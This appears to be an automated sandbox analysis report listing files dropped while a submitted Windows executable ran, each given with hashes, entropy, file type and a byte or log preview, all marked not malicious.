SHA-512: 3E7C8968A2805C56F5534B09DDD18CA9402C4284DDC4114086D45F7E806BE1EEB5ACCE279DA4806C1682D88AA2AC8576595F9D9C9BC73491AE8A1F7DEAC83FB7
Malicious: false
Preview: .... .c.... (remainder of the preview is non-printable binary data)

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type: data
Category: dropped
Size (bytes): 66726
Entropy (8bit): 5.392739213842091
Encrypted: false
SSDEEP: 768:RNOpblrU6TBH44ADKZEgdNyPciqC/uGuru6oDwJFeYMGSKWyYyu:6a6TZ44ADE2kiSrFJ8T9KtK
MD5: D9E23ABD95D6E43482D19C99F3AAABEE
SHA1: 3A5677760C72A2C2DE3AB3C32A4AC250E03CF52C
SHA-256: 1E6FF135F557114808ED9B1D23AD5BCEB6D214BA5F20DD9CFC9AE2B21403282C
SHA-512: 86207B9EF52776F6F0531555E1FA0FF8551DF49D3F004372D38211688EA4F753EBE84BB524DAEF16C9014D852DDF83E0AE55B10ECBB8866AFD6F9986F031A033
Malicious: false
Preview: 4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Preview: @...e...........................................................

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 246
Entropy (8bit): 3.5197430193686525
Encrypted: false
SSDEEP: 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8V6qt:Qw946cPbiOxDlbYnuRKkd
MD5: 8CCC34D10210641042087F55D78E0E54
SHA1: 0F57061847B1C17417926E2B2AD307039D390CE2
SHA-256: 4AFFDC9CD19035F0FACE0880023250F6730E3BF66211AC3467D9BC0F6C6A0D75
SHA-512: 2913C1D51A7C11358D2BE7BF51C9E21723BD4444666C74F02856FDAAE0B1518D0113E6E72AC0AB296DD20E80D7957B0C105DDBAC30F649B7BB137E257B62EF22
Malicious: false
Preview: ..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.6./.1.2./.2.0.2.4. . .0.9.:.4.6.:.4.4. .=.=.=.....

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:ASCII text, with very long lines (393)
                                                              Category:dropped
                                                              Size (bytes):16525
                                                              Entropy (8bit):5.330589339471305
                                                              Encrypted:false
                                                              SSDEEP:384:usQfQQjZyDzISMjg0svDBjA49Y0/sQHpMVhrSWD0Wny6WxIWd44mJmtaEKHvMMwh:Ink
                                                              MD5:5BC0A308794F062FEC40F3016568DF9F
                                                              SHA1:14149448191AB45E99011CBBEF39F2A9A03A0D15
                                                              SHA-256:00D910C49F2885F6810F4019A916EFA52F12881CBF1525853D0C184E1B796473
                                                              SHA-512:CF12E0787C1C2A129BE61C4572CF8A28FC48039B2ADFD1816E58078D8DD900771442F210C545AD9B3F4EAEC23F6F1480F7BBF262B6A631160B20D0785BC17242
                                                              Malicious:false
                                                              Preview:SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:171+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):15114
                                                              Entropy (8bit):5.359813390514335
                                                              Encrypted:false
                                                              SSDEEP:384:usedWgL/lyv9KApRJy6FXqTvEtr8fkouzMgMeaurKxGw+jMj5c4TJAJsWEGSOayu:aoY
                                                              MD5:FC46EFBE155743409FD543083403DE6D
                                                              SHA1:03AE706BEB87810A2B5043EFB25622E9D7193B34
                                                              SHA-256:2A7ABAEF44D5148AE75D5F99005C82AC8821FF626ED3806C726F0057B0713ED9
                                                              SHA-512:A8F6831C29B6140EAA7F23AF2E0FD28FCA2F8390B809A6B9B338B018CC0DBCA9A2AB3DF4B35B9C9B75B0EE4B6723D283A5C99C710E8EB96925C79592CEF2B401
                                                              Malicious:false
                                                              Preview:SessionID=18d98708-b58c-4298-8e05-092a72455d34.1733496398623 Timestamp=2024-12-06T09:46:38:623-0500 ThreadID=6060 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=18d98708-b58c-4298-8e05-092a72455d34.1733496398623 Timestamp=2024-12-06T09:46:38:624-0500 ThreadID=6060 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=18d98708-b58c-4298-8e05-092a72455d34.1733496398623 Timestamp=2024-12-06T09:46:38:624-0500 ThreadID=6060 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=18d98708-b58c-4298-8e05-092a72455d34.1733496398623 Timestamp=2024-12-06T09:46:38:624-0500 ThreadID=6060 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=18d98708-b58c-4298-8e05-092a72455d34.1733496398623 Timestamp=2024-12-06T09:46:38:624-0500 ThreadID=6060 Component=ngl-lib_NglAppLib Description="SetConf
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):29752
                                                              Entropy (8bit):5.402079934207563
                                                              Encrypted:false
                                                              SSDEEP:192:icbENIn5cbqlcbgIpLcbJcb4I5jcbKcbQIrxcbmdcb0IWAcbB:8qnXopZ50roWP
                                                              MD5:84B6FD5588075EB77B216A13F95D96CA
                                                              SHA1:1DAE3C4E3380F23F14F807FDDA358AD9234D9247
                                                              SHA-256:A006DCB70E5F6374A3AA99EEE4D247A7F84CB8DF87540D809912D4E478BBCEC8
                                                              SHA-512:8423487E3C418BB5BFB3600AAB611E2F47D0776BA7E6CB8133E7132A555E83806C15BD0FDF4AF04DDEB50C6422E55A601539CB2E3D0A74F18028947D5D708D8E
                                                              Malicious:false
                                                              Preview:05-10-2023 10:01:02:.---2---..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 10:01:02:.Closing File..05-10-
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                              Category:dropped
                                                              Size (bytes):1407294
                                                              Entropy (8bit):7.97605879016224
                                                              Encrypted:false
                                                              SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                              MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                              SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                              SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                              SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                              Malicious:false
                                                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                              Category:dropped
                                                              Size (bytes):386528
                                                              Entropy (8bit):7.9736851559892425
                                                              Encrypted:false
                                                              SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                              MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                              SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                              SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                              SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                              Malicious:false
                                                              Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                              Category:dropped
                                                              Size (bytes):1419751
                                                              Entropy (8bit):7.976496077007677
                                                              Encrypted:false
                                                              SSDEEP:24576:/rwYIGNP4mOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:TwZG6bWLxBGZN3mlind9i4ufFXpAXkru
                                                              MD5:95F182500FC92778102336D2D5AADCC8
                                                              SHA1:BEC510B6B3D595833AF46B04C5843B95D2A0A6C9
                                                              SHA-256:9F9C041D7EE1DA404E53022D475B9E6D5924A17C08D5FDEC58C0A1DCDCC4D4C9
                                                              SHA-512:D7C022459486D124CC6CDACEAD8D46E16EDC472F4780A27C29D98B35AD01A9BA95F62155433264CC12C32BFF384C7ECAFCE0AC45853326CBC622AE65EE0D90BA
                                                              Malicious:false
                                                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                              Category:dropped
                                                              Size (bytes):758601
                                                              Entropy (8bit):7.98639316555857
                                                              Encrypted:false
                                                              SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                              MD5:3A49135134665364308390AC398006F1
                                                              SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                              SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                              SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                              Malicious:false
                                                              Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:PDF document, version 1.7, 1 pages
                                                              Category:dropped
                                                              Size (bytes):126079
                                                              Entropy (8bit):7.943849374898452
                                                              Encrypted:false
                                                              SSDEEP:3072:491AUlpumVlx1KDctCivx/JII6GE2XAYX:7wFVlxtvxXE2XL
                                                              MD5:883B3959460633ADD1FDDEB2B3060765
                                                              SHA1:A70C7DEB8F428678A43156C08267568984D0B712
                                                              SHA-256:82C26B4F1DE6AC3DB8689BDF21D64B63837DF027F37EA6878F799B5CB4D65596
                                                              SHA-512:EFCC6208349802B6EC36DF856718AD91C63A6D13FDBA712635D84A880269C0357B009D8A710B2CFECEB77AE07B46DC9BC84F4053F4E45C56FE4778A5A464E7BF
                                                              Malicious:false
                                                              Preview:%PDF-1.7.%.....1 0 obj .<<./ColorSpace /DeviceRGB./Subtype /Image./Height 1083./Filter /FlateDecode./Type /XObject./Width 851./BitsPerComponent 8./Length 125221.>>.stream.x...e.$..q\.{..................].w..n..Cp. y...../gU...cHf_.f..]ud.-.SU.S.%I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I..*~....=.$I.$I.....W_..CH.$I.$I~.......!$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I2@|..}...{.{...[n....r.SO=....kp.-I.$I.?/....?.O?....|....{pO:I.$I.dHd...Z..b.5..K~...=.$I.$I.!..g.q.:..J..f.].7.x..tP.NN.$I.$.`!..Xc....n6h.h...o..F.)._.$I.$.`$..4.L...O.7hx...9...2._.$I.$.`...z....G........
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6220
                                                              Entropy (8bit):3.7217410808888496
                                                              Encrypted:false
                                                              SSDEEP:48:QrUIxUI9QuCnU2bHJvwwukvhkvklCyw0NoYHVlUWGSogZoQtoYHVlKGSogZoE1:yhSuQuCUQZgkvhkvCCtkLHVRH3LHVqHz
                                                              MD5:C2FB90572F64723E427E5E0F000C54F4
                                                              SHA1:B3AE2ECF901329D54CEBD34747DAC3D418F49E74
                                                              SHA-256:9C7F88715E19911EF3D9BAE874E1B09322164034F5D27A5237E1FCD79CC31374
                                                              SHA-512:49219AB865457647197309F4BB6435929CE798D036F2986825BB5DFBB0F94EEB0D48226A5A9A94859B7716CB81A1EB7FF4D558B68C97B804BFA06E3F5EBE0BA2
                                                              Malicious:false
                                                              Preview:...................................FL..................F.".. ....'GDj........G..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj....Zu..G.......G......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y.u..........................=...A.p.p.D.a.t.a...B.V.1......Y.u..Roaming.@......EWsG.Y.u...........................pq.R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Y.u..........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Y.u...........................{..W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Y.u....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW.I..Programs..j......EWsG.Y.u....................@.....?5..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsGEWsG..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsG.Y.u................
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6220
                                                              Entropy (8bit):3.7217410808888496
                                                              Encrypted:false
                                                              SSDEEP:48:QrUIxUI9QuCnU2bHJvwwukvhkvklCyw0NoYHVlUWGSogZoQtoYHVlKGSogZoE1:yhSuQuCUQZgkvhkvCCtkLHVRH3LHVqHz
                                                              MD5:C2FB90572F64723E427E5E0F000C54F4
                                                              SHA1:B3AE2ECF901329D54CEBD34747DAC3D418F49E74
                                                              SHA-256:9C7F88715E19911EF3D9BAE874E1B09322164034F5D27A5237E1FCD79CC31374
                                                              SHA-512:49219AB865457647197309F4BB6435929CE798D036F2986825BB5DFBB0F94EEB0D48226A5A9A94859B7716CB81A1EB7FF4D558B68C97B804BFA06E3F5EBE0BA2
                                                              Malicious:false
                                                              Preview:...................................FL..................F.".. ....'GDj........G..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj....Zu..G.......G......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y.u..........................=...A.p.p.D.a.t.a...B.V.1......Y.u..Roaming.@......EWsG.Y.u...........................pq.R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Y.u..........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Y.u...........................{..W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Y.u....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW.I..Programs..j......EWsG.Y.u....................@.....?5..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsGEWsG..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsG.Y.u................
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):55
                                                              Entropy (8bit):4.306461250274409
                                                              Encrypted:false
                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                              Malicious:false
                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                              File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                              Entropy (8bit):7.748470243900274
                                                              TrID:
                                                              • Win64 Executable (generic) (12005/4) 74.95%
                                                              • Generic Win/DOS Executable (2004/3) 12.51%
                                                              • DOS Executable Generic (2002/1) 12.50%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                              File name:lg1wwLsmCX.exe
                                                              File size:64'456 bytes
                                                              MD5:1ceb5d0cb063290c1f66fccfed96a220
                                                              SHA1:09b735e87dd4ef4917d2e1bcd969408c3ac099fd
